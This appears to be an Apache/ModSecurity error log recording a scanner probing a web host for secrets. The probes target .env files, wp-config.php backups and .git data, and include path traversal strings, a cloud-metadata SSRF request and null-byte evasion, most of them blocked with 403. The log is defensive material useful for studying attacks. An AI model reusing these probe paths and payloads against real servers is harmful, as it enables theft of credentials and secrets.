[Tue May 12 05:21:58.311131 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:59.011035 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.238:54010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1Nr1yOh9TvizezidZQAAAEs"]
[Tue May 12 05:21:59.029053 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.238:54010] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.gitignore"] [unique_id "agKc19r1yOh9TvizezidcQAAAEs"]
[Tue May 12 05:21:59.029251 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.238:54010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.gitignore"] [unique_id "agKc19r1yOh9TvizezidcQAAAEs"]
[Tue May 12 05:21:59.133280 2026] [access_compat:error] [pid 1842385:tid 1842415] [client 45.148.10.238:54000] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:21:59.281984 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.238:54092] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKc1xs7kySIUZ3ORnIkbwAAARQ"]
[Tue May 12 05:21:59.282193 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.238:54092] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKc1xs7kySIUZ3ORnIkbwAAARQ"]
[Tue May 12 05:21:59.454476 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1M1tk6y7yBJLpJo36AAAAIQ"]
[Tue May 12 05:21:59.472921 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKc181tk6y7yBJLpJo37gAAAIQ"]
[Tue May 12 05:21:59.473122 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKc181tk6y7yBJLpJo37gAAAIQ"]
[Tue May 12 05:21:59.705075 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.238:54066] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/config/.env"] [unique_id "agKc1xfeipD4uoG21FouuwAAABU"]
[Tue May 12 05:21:59.705274 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.238:54066] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/.env"] [unique_id "agKc1xfeipD4uoG21FouuwAAABU"]
[Tue May 12 05:22:00.434062 2026] [security2:error] [pid 1825287:tid 1825304] [client 185.176.207.186:62957] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKc2AgpmE1yW0glLdgsLwAAAMA"], referer: https://www.piregwan-genesis.com/
[Tue May 12 05:22:01.529357 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.238:54210] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/wp-config.php.bak"] [unique_id "agKc2dr1yOh9TvizeziddgAAAEk"]
[Tue May 12 05:22:01.529557 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.238:54210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/wp-config.php.bak"] [unique_id "agKc2dr1yOh9TvizeziddgAAAEk"]
[Tue May 12 05:22:01.534090 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.534153 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.534188 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.534385 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.534446 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.534518 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.534933 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:01.536298 2026] [core:error] [pid 1820198:tid 1820203] [client 45.148.10.238:54312] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 05:22:01.540678 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.238:54290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKc2QgpmE1yW0glLdgsMQAAANE"]
[Tue May 12 05:22:01.540845 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.238:54290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKc2QgpmE1yW0glLdgsMQAAANE"]
[Tue May 12 05:22:01.545328 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:54346] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image"] [unique_id "agKc2QgpmE1yW0glLdgsMgAAANg"]
[Tue May 12 05:22:01.546013 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:54346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image"] [unique_id "agKc2QgpmE1yW0glLdgsMgAAANg"]
[Tue May 12 05:22:01.548640 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.238:54200] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/wp-config.php.txt"] [unique_id "agKc2dr1yOh9TvizezideAAAAEY"]
[Tue May 12 05:22:01.548825 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.238:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/wp-config.php.txt"] [unique_id "agKc2dr1yOh9TvizezideAAAAEY"]
[Tue May 12 05:22:01.553572 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.238:54276] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/local/.env"] [unique_id "agKc2QgpmE1yW0glLdgsMwAAAMQ"]
[Tue May 12 05:22:01.553717 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.238:54276] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/local/.env"] [unique_id "agKc2QgpmE1yW0glLdgsMwAAAMQ"]
[Tue May 12 05:22:01.553849 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.238:54278] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/wp-config.php~"] [unique_id "agKc2RfeipD4uoG21FouwgAAAAA"]
[Tue May 12 05:22:01.553994 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.238:54278] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/wp-config.php~"] [unique_id "agKc2RfeipD4uoG21FouwgAAAAA"]
[Tue May 12 05:22:01.555496 2026] [security2:error] [pid 1825179:tid 1825217] [client 45.148.10.238:54194] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKc2dr1yOh9TvizezideQAAAFM"]
[Tue May 12 05:22:01.555630 2026] [security2:error] [pid 1825179:tid 1825217] [client 45.148.10.238:54194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/storage/.env"] [unique_id "agKc2dr1yOh9TvizezideQAAAFM"]
[Tue May 12 05:22:01.555861 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:54242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production.local"] [unique_id "agKc2Rs7kySIUZ3ORnIkdwAAAQE"]
[Tue May 12 05:22:01.556001 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:54242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production.local"] [unique_id "agKc2Rs7kySIUZ3ORnIkdwAAAQE"]
[Tue May 12 05:22:03.089007 2026] [:error] [pid 1842385:tid 1842394] [client 20.226.81.141:42962] File does not exist: /home/cpcentre/public_html/bthil.php
[Tue May 12 05:22:03.955492 2026] [security2:error] [pid 1820198:tid 1820218] [client 45.148.10.238:29592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKc281tk6y7yBJLpJo39QAAAJI"]
